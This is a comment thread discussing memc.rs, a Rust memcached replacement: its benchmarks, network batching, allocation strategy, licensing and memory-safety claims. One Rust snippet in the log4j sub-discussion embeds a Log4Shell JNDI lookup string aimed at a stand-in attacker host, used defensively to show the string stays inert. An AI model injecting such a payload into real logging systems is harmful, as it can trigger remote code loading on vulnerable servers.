awestroke
saulrh
Honestly, still kind of impressive that an off-the-shelf concurrent hashmap can get within even a factor of two of the best-in-class hundreds-of-engineer-years piece of open-source software and all the fine-tuning that major enterprise users have contributed to it. Like, given how much infra budget goes into running big KV stores, I'd assume that memcached has been optimized to within an inch of its life across almost the entirety of its codebase, all the way up to the really hardcore stuff. Being able to just... grab a package and get within spitting distance of it is kind of amazing. IME when you do that you're lucky to get within two OOM.
AceJohnny2
I agree, but on the other hand you know the saying: "90% of the work takes 90% of the time, the 10% remaining takes the other 90% of the time."
How much effort would be required to get memc to equal or surpass memcached's performance? Would it require rewriting the data structures from scratch? Fine-tuning or replacing the Tokio runtime?
Aperocky
> factor of two of the best-in-class
Would be surprised if it didn't, and most of the time it should probably be even.
It's the edge cases that separate a naive implementation from industrial usage. And off-the-shelf concurrent hashmaps are already pretty advanced.
CodesInChaos
> use sophisticated strategies to reduce allocation calls and memory fragmentation
Both of these are things a high-quality allocator (jemalloc in this case) has to optimize for as well (in this context, "allocation calls" corresponds to syscalls). For example, they also allocate different sizes from different buckets.
Applications do have some abilities an allocator does not, for example:
* An application can move allocations, since it is free to invalidate its own pointers. This enables defragmentation/compaction.
* It can try to predict how long-lived an allocation will be.
But it's not clear to me if any of these are important for performance.
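The bucket idea mentioned above can be sketched in a few lines. This is only an illustration of size-class rounding; the class sizes below are invented and match neither jemalloc's bins nor memcached's slab classes exactly:

```rust
// Toy sketch of size-class bucketing, the idea behind both jemalloc's
// bins and memcached's slab classes: round each request up to a fixed
// class so freed chunks are reusable without fragmenting the heap.
// These class sizes are made up for illustration.
const CLASSES: &[usize] = &[16, 32, 64, 128, 256, 512, 1024];

/// Return the smallest class that fits `size`, or None for a "large"
/// allocation that would go straight to the OS (e.g. via mmap).
fn size_class(size: usize) -> Option<usize> {
    CLASSES.iter().copied().find(|&c| c >= size)
}

fn main() {
    assert_eq!(size_class(20), Some(32));   // rounded up, some slack
    assert_eq!(size_class(512), Some(512)); // exact fit
    assert_eq!(size_class(4096), None);     // too big for any class
}
```

The cost of this scheme is internal fragmentation (the slack between 20 and 32 above), which is the trade both allocators accept to make free-list reuse cheap.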
rurban
Memcached uses an outdated and slow hash function and hashtable. This project uses jemalloc and a concurrent hashtable. Seems to be miles better.
tinktank
> Memcache uses an outdated and slow hash and hashtable.
No it doesn't. A cursory scan through the code will tell you as much.
rurban
Exactly why I said so. I even started improving it some years ago, but got sidetracked. The only nice thing about the code is the signals on htable updates. But a proper, fast concurrent hashtable would work wonders.
Lhiw
Not this again...
maxmcd
memc has a measuring performance section: https://github.com/memc-rs/memc-rs#measuring-performance
As an arbitrary example, on my machine if I run memtier_benchmark like so:
memtier_benchmark --port=11211 --protocol=memcache_binary \
-t 4 --ratio=1:1 --pipeline=9 -c 16 \
-d 100 --key-pattern=S:S --key-minimum=1 \
--key-maximum=1000000 -n allkeys
I get the following results: memc: 63999483 ops, 587092 ops/sec, 51.39MB/sec, avg 0.82 msec latency
memcache: 63999936 ops, 2391777 ops/sec, 209.34MB/sec, avg 0.24 msec latency
memtier_benchmark also prints more detailed stats, but I couldn't get those to work for memc; not sure what's going on there. If we set the set/get ratio to 1:10 (maybe more realistic), they get much closer:
memc: 6399480 ops, 639989 ops/sec, 28.45MB/sec, avg 0.67 msec latency
memcache: 6399623 ops, 1291566 ops/sec, 57.41MB/sec, avg 0.40 msec latency
injinj
A Wireshark capture shows that memcrsd is breaking up the response packets rather than optimizing its network writes, sending a lot more packets than memcached. With the 100-byte value size, memcached packs 10 PDUs per packet while memcrsd sends 1.
Using memtier_benchmark --pipeline=1 with "memcached -t 1" and "memcrsd -r 1" shows almost identical results (141943 vs 136550) on my machine (keys 1 -> 100000). The network is where most of the CPU is spent in both memcached and memcrsd cases.
I'm slightly impressed with memcrsd/Rust scaling: 32 runtimes with 16 memtier_benchmark threads at pipeline=9 can produce 4 million ops/sec. They need to fix the networking parts.
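The packing problem described here is essentially write coalescing. A minimal Rust sketch of why buffering pipelined responses before flushing cuts the packet count; this is not memcrsd's actual code, and the CountingSink below is a made-up stand-in for a TCP socket:

```rust
use std::io::{self, BufWriter, Write};

/// Counts how many write() calls reach the underlying transport;
/// each such call roughly corresponds to a syscall (and, for small
/// buffers, often a packet) on a real TcpStream.
struct CountingSink { writes: usize }

impl Write for CountingSink {
    fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
        self.writes += 1;
        Ok(buf.len())
    }
    fn flush(&mut self) -> io::Result<()> { Ok(()) }
}

/// Returns (unbatched write count, batched write count) for the
/// same set of pipelined responses.
fn write_counts(responses: &[Vec<u8>]) -> (usize, usize) {
    // Naive: one write per response, i.e. one PDU per packet.
    let mut naive = CountingSink { writes: 0 };
    for r in responses { naive.write_all(r).unwrap(); }

    // Batched: buffer all pipelined responses, flush once.
    let mut batched = CountingSink { writes: 0 };
    {
        let mut buf = BufWriter::with_capacity(4096, &mut batched);
        for r in responses { buf.write_all(r).unwrap(); }
        buf.flush().unwrap();
    }
    (naive.writes, batched.writes)
}

fn main() {
    // Ten 100-byte responses, like the benchmark's -d 100 workload.
    let responses: Vec<Vec<u8>> = (0..10).map(|i| vec![i as u8; 100]).collect();
    assert_eq!(write_counts(&responses), (10, 1)); // 10 packets vs 1
}
```

In a real server the flush point would be "end of the currently readable pipeline batch" rather than an explicit call, but the effect on packet counts is the same.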
I think most will use horizontal scaling anyway, and simply shard the memcacheds and skip the threading concurrency. Multiple memcacheds with client-side sharding is hard to beat.
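Client-side sharding of the kind described above can be as simple as hashing the key to pick a server. A hypothetical sketch follows; the server names are invented, and real clients usually prefer consistent hashing so that a dead node only remaps about 1/N of the keyspace instead of nearly all of it:

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

/// Route a key to one server in the pool by hashing it.
/// Simple modulo sharding: fine while the pool is static.
fn shard<'a>(key: &str, servers: &'a [&'a str]) -> &'a str {
    let mut h = DefaultHasher::new();
    key.hash(&mut h);
    servers[(h.finish() % servers.len() as u64) as usize]
}

fn main() {
    let pool = ["cache1:11211", "cache2:11211", "cache3:11211"];
    // The same key always routes to the same shard, so each
    // memcached instance stays single-purpose and uncontended.
    assert_eq!(shard("user:42", &pool), shard("user:42", &pool));
    assert!(pool.contains(&shard("user:42", &pool)));
}
```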
maxpert
Some time back I did a Golang-based memcache server implementation with BoltDB (and experimented with Pebble as well). I dropped that implementation out of fear that nobody would be interested in using it, and I have the same question here, I guess: why would I drop an existing battle-tested solution for something that might still have non-memory-safety bugs?
montroser
Cool, but what problem is this meant to solve? How does it compare to memcached in terms of performance?
mfrw
I am not among the ones who would blindly say 'rewrite it in Rust', but given what happened with log4j, I would much rather choose an implementation with the memory safety that Rust provides.
This does not mean Rust might not have its fair share of bugs; IMHO the probability is just a little lower.
Edit: I mentioned the log4j RCE because it was new; I do not mean to imply that it would not have happened if we had a Rust implementation. As the comments have mentioned, it would be the same in any language, IMO.
sorokod
You misunderstand the recent RCE in log4j. It has nothing to do with memory safety and can be implemented in Rust without any difficulty.
spullara
Further, it wasn't even a bug. It was well-defined behavior, working as specified.
staticassertion
> and can be implemented in Rust without any difficulty.
Not really. You'd have to fight the language and pull in some crates, to be sure. There's no native object serialization in rust and it's not really a concept in the language or ecosystem - except perhaps in the future with wasm runtimes.
There are numerous details of log4j that, in general, just don't apply to rust code.
edit: Since perhaps people don't believe me...
Rust has no equivalent of JNDI, pickle, etc. There is no way to send rust 'code' except, perhaps, wasm. Certainly there's no well supported way with decades of history of being ingrained into libraries, or patterns that support it.
tialaramex
I think it would actually be pretty tricky to do that in Rust without realising what you'd done, as seemingly happened to log4j.
The root of the log4j problem is a failure to distinguish between log format strings and the formatted log string. Beyond that, what happens is that Java allows a lot of runtime flexibility which simply doesn't exist in Rust. In Java it's fine to pull in classes at runtime that you've never used before and run them; you can't do that in Rust, where the types only exist at compile time. Indeed this is a key feature of Rust, because it means wrapper types are free at runtime, invaluable to the embedded firmware community, who love type checking and other safety features but can't afford runtime overhead.
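One concrete way to see the format-string point: in Rust, `format!` only accepts a literal template, checked at compile time, so attacker-controlled data can only ever be an argument, never a template. A small sketch; `log_line` is a made-up helper for illustration, not a real logging API:

```rust
// In Rust the format string must be a literal, so the braces below
// are the entire "template language". Passing a runtime string as
// the template (format!(user_input)) would not even compile.
fn log_line(user_input: &str) -> String {
    format!("login attempt: {}", user_input)
}

fn main() {
    // The lookup syntax that triggered Log4Shell is inert text here:
    // it is interpolated as data, never evaluated.
    let line = log_line("${jndi:ldap://evil.example/a}");
    assert_eq!(line, "login attempt: ${jndi:ldap://evil.example/a}");
}
```

log4j's failure mode was re-scanning the *formatted* string for `${...}` directives, which is a library design choice rather than a language guarantee, but Rust's literal-only templates make the template/data confusion much harder to introduce by accident.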
mfrw
I did not mean that the log4j RCE is a memory safety issue; it's just that I would prefer to choose something where the probability of having to wake up in the middle of the night to fix it is lower. Honestly, I would care less whether it's memory safety or whatever, given I had to wake up at midnight :)
charcircuit
If log4j had been implemented in Rust, that feature would never have been implemented in the first place, meaning the RCE wouldn't exist.
zamalek
> IMHO the probability is a little less.
Exactly, Rust simply eliminates a certain class of bugs. You can still make some really major mistakes in the absence of these bugs, e.g. "goto fail" could have easily been written in Rust.
vlmutolo
The "goto fail" bug isn't a great example; Rust actually does specifically guard against this by requiring curly braces around the body of "if".
Here's an explanation of "goto fail", which includes a code snippet.
https://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-got...
If C conditionals required explicit braces around the body, the second fail would have been redundant code instead of a security vulnerability.
Additionally, Rust will warn you if you have "unreachable" code, such as all the code after the unconditional "goto fail". Though I'm sure modern C compilers would also warn about this.
All that said, Rust definitely does have plenty of bug classes left for people to trip over. Integer under/overflows come to mind (though they're just logic errors instead of undefined behavior).
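Under the braces-required grammar described above, the goto-fail shape degenerates into a compiler warning instead of a vulnerability. A rough Rust transcription of the pattern; `check` is a hypothetical stand-in, not the actual SecureTransport verification code:

```rust
// The C bug depended on an if-body without braces, so the pasted
// second `goto fail;` ran unconditionally. Rust's grammar makes that
// shape unwritable: the body must be braced, so a pasted duplicate
// stays inside the condition (and trips the unreachable_code lint).
fn check(update_ok: bool) -> Result<(), &'static str> {
    if !update_ok {
        return Err("hash update failed");
        // return Err("hash update failed"); // pasted duplicate:
        // unreachable dead code here, still conditional, not a
        // silent early return that skips later signature checks.
    }
    Ok(())
}

fn main() {
    assert_eq!(check(true), Ok(()));
    assert_eq!(check(false), Err("hash update failed"));
}
```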
ordiel
Most certainly it opens the door to a different kind of bug. This mentality of tying bugs to a language demonstrates a very poor understanding of the issues themselves; if anything, a large-impact bug demonstrates wide adoption of an individual piece of software, most probably chosen for its stability or ease of use.
Remember heartbleed?...
harryf
I don't get it. Just starting with the three main benefits listed on the website, none of these are compelling...
> Safe: Implemented in Rust programming language and using Tokio runtime ensures memory and thread safety.
Does memcached have issues with memory and thread safety? I've never heard of them if it does.
> Fast: Can process thousands of requests with minimal overhead.
For a network cache you want _predictable_ performance more than "fast" performance, so that you're able to predict how a system will scale. "Fast" on its own is not among the top priorities for choosing a network cache implementation.
> Compatible: memc.rs is 100% compatible with memcached binary protocol. No need to rewrite your code. Just start a server and use your favorite language/framework.
What about tools for monitoring memcached in production? Does it support consistent hashing across a pool of memcached servers?
Ultimately: why?
akx
Well yes, memcached has apparently had its share of memory-corruption vulnerabilities. https://www.cvedetails.com/vulnerability-list/vendor_id-1299...
aftbit
What can this do that memcached can't? We use memcached heavily in PROD, but I would be hard-pressed to replace it with an upstart competitor just because it is possible.
buro9
Memcached is BSD-licensed.
This is AGPL or commercial.
The biggest difference I could find was not in its capability as a drop-in replacement but in the change of licence: any changes you might make to fit your needs now come under different terms.
I guess the bet here is predicated on that... are companies running versions of memcached that are much improved and they're not sharing those improvements? Could this be a way to make those improvements public by this replacing memcached over time?
I'm not sure how they could do a commercial licence once they've accepted contributions, if they don't have a CLA granting the right over the contributions. But IANAL, etc.
adrr
The license doesn't matter here. If I modify this code and don't distribute it, I have zero obligation to publish/share my changes. These are copyright licenses and license agreements; distribution is the trigger for copyright licenses.
dodobirdlord
(Assuming we’re talking about US law) Since the previous comment was talking about commercial use, there’s no entitlement to use someone else’s code for commercial purposes at all absent some sort of license agreement (or waiver, or fair use, or some other exception). If the license granting the right to use the code in the first place requires sharing changes, then someone using the code with modifications has to either share the changes or infringe copyright.
CodeWriter23
> Could this be a way to make those improvements public by this replacing memcached over time?
Those who wish to share their contributions will, regardless of license. Those who do not, will stick to code with BSD-style licenses.
erk__
They do indeed have a CLA: https://cla-assistant.io/memc-rs/memc-rs
buro9
Ah, awesome. I did not see this mentioned in the contributing.md file (it may have been there, I just didn't notice it).
lumost
Biggest value prop seems to be that it's a single binary built off cargo, and that it's rust based. I wouldn't be surprised to see “single binary” become a selling point for container based shops even if all else is equal.
evanelias
AFAIK, memcached's only mandatory external dependency is libevent. And you can statically link that if you want.
galkk
Soon we'll see an entire docker-compose stack packed into a single binary, and everything will come back around again.
qaq
It's a pretty convenient option for local dev. I am working on a project that has 7 services, but they can be bundled into a single binary that has all 7 and NATS packaged in (plus you can spin up multiple instances of the services). Very convenient, and it builds in a few seconds.
aledalgrande
And after a few years, "modular architecture with dynamically linked libraries! lean binaries!"
mrweasel
Unless you're doing something very special, I'd guess that most container-based solutions will just use the memcached Docker image from Docker Hub. There's very little to be gained from a "single binary" alternative over that image.
keyle
s/Drop-In Replacement/Rust partial reimplementation/
reyqn
Reading their GitHub, I was under the impression that it was an actual drop-in replacement; the capability status shows it passing all tests from memcapable. Am I missing something?
tayo42
It won't perform as well; memcached does a lot of its own memory management, while this defers all the storage to a library. The eviction policy is also not the same: random eviction might catch some people off guard if you're expecting what memcached does. It doesn't seem to support the ASCII protocol either, and I didn't see anything similar to the disk-based/persistent storage memcached has now.
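The eviction difference is easy to sketch. A toy cache that evicts an arbitrary victim when full; this illustrates the surprise factor of non-LRU eviction and is not memc's actual code:

```rust
use std::collections::HashMap;

/// Minimal full-cache eviction sketch with an arbitrary victim,
/// as opposed to memcached's (approximate) LRU. The victim is just
/// whatever key the iterator yields first, effectively random.
struct Cache { map: HashMap<String, String>, cap: usize }

impl Cache {
    fn new(cap: usize) -> Self { Cache { map: HashMap::new(), cap } }

    fn insert(&mut self, k: String, v: String) {
        if self.map.len() >= self.cap && !self.map.contains_key(&k) {
            // Arbitrary victim: a hot, recently-read key is as likely
            // to be dropped as a cold one. Under LRU the coldest key
            // would go instead, which is what callers tend to expect.
            if let Some(victim) = self.map.keys().next().cloned() {
                self.map.remove(&victim);
            }
        }
        self.map.insert(k, v);
    }
}

fn main() {
    let mut c = Cache::new(2);
    c.insert("a".into(), "1".into());
    c.insert("b".into(), "2".into());
    c.insert("c".into(), "3".into()); // evicts "a" or "b", unpredictably
    assert_eq!(c.map.len(), 2);
    assert!(c.map.contains_key("c"));
}
```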
nodesocket
Does memc.rs have the ability to do replication (master/slave)?
tommica
It's great that they made it; it's always good to have alternatives, and when they're made this well, it's just good for the ecosystem.
This seems to be a concurrent hashmap (dashmap[1]) with a server speaking the memcached protocol. I know both memcached and redis use sophisticated strategies to reduce allocation calls and memory fragmentation, but this seems to do nothing like that.
[1]: https://docs.rs/dashmap/latest/dashmap/
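For a rough idea of what such a concurrent hashmap does internally, dashmap-style sharding can be sketched with the standard library alone. This is a simplification of the shape, not dashmap's implementation, which uses RwLocks and a tuned hasher:

```rust
use std::collections::hash_map::DefaultHasher;
use std::collections::HashMap;
use std::hash::{Hash, Hasher};
use std::sync::Mutex;

/// Split the keyspace into N independently locked shards so that
/// writers touching different shards never contend on one lock.
struct ShardedMap { shards: Vec<Mutex<HashMap<String, Vec<u8>>>> }

impl ShardedMap {
    fn new(n: usize) -> Self {
        Self { shards: (0..n).map(|_| Mutex::new(HashMap::new())).collect() }
    }

    fn shard_for(&self, key: &str) -> usize {
        let mut h = DefaultHasher::new();
        key.hash(&mut h);
        (h.finish() as usize) % self.shards.len()
    }

    fn insert(&self, key: String, val: Vec<u8>) {
        let i = self.shard_for(&key);
        self.shards[i].lock().unwrap().insert(key, val);
    }

    fn get(&self, key: &str) -> Option<Vec<u8>> {
        let i = self.shard_for(key);
        self.shards[i].lock().unwrap().get(key).cloned()
    }
}

fn main() {
    let m = ShardedMap::new(16);
    m.insert("key".into(), b"value".to_vec());
    assert_eq!(m.get("key"), Some(b"value".to_vec()));
    assert_eq!(m.get("missing"), None);
}
```

Note that nothing here addresses allocation batching or fragmentation, which is exactly the gap the comment above is pointing at.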